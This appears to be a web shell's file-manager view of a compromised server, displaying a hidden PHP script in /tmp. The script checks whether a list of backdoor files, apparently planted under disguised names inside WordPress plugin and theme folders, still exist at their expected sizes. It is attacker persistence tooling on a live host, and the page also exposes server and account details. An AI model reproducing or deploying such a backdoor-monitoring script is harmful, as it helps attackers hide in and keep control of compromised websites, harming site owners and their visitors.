HEX
Server: Apache
System: Linux srv3.designthinguk.com 4.18.0-553.111.1.lve.el8.x86_64 #1 SMP Fri Mar 13 13:42:17 UTC 2026 x86_64
User: lpenergy (1163)
PHP: 8.1.34
Disabled: NONE
Upload Files
File: //tmp/.entity
<?php   $r = '/home/lpenergy/public_html'; $x = ["/oldsite/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/Ge/BBCode.php"=>"bd@@136229@@1005",
"/oldsite/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/validation/no_special_chars/validation.no.special.chars.php"=>"bd@@142132@@894",
"/wp-content/plugins/social-1779182130/wf-flyout/icons/custom.file.2.1779182131.php"=>"bd@@126776@@846",
"/oldsite/wp-content/plugins/fusion-builder/inc/lib/inc/redux/framework/FusionReduxCore/templates/panel/content.stickybar.php"=>"bd@@136017@@887",
"/wp-content/plugins/fusion-builder/inc/lib/inc/redux/framework/FusionReduxCore/inc/welcome/views/status.php"=>"bd@@136334@@915",
"/oldsite/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/fields/spinner/field.spinner.php"=>"bd@@135597@@1022",
"/oldsite/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/fields/info/field.info.php"=>"bd@@143024@@915",
"/oldsite/wp-content/plugins/fusion-builder/inc/lib/inc/redux/framework/FusionReduxCore/inc/validation/no_html/validation.no.html.php"=>"bd@@141258@@1025",
"/oldsite/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/fields/textarea/field.textarea.php"=>"bd@@143050@@957",
"/oldsite/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/fields/editor/field.editor.php"=>"bd@@134890@@881",
"/oldsite/wp-content/themes/Avada/includes/lib/inc/redux/framework/FusionReduxCore/inc/fields/color_rgba/field.color.rgba.php"=>"bd@@142582@@999"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');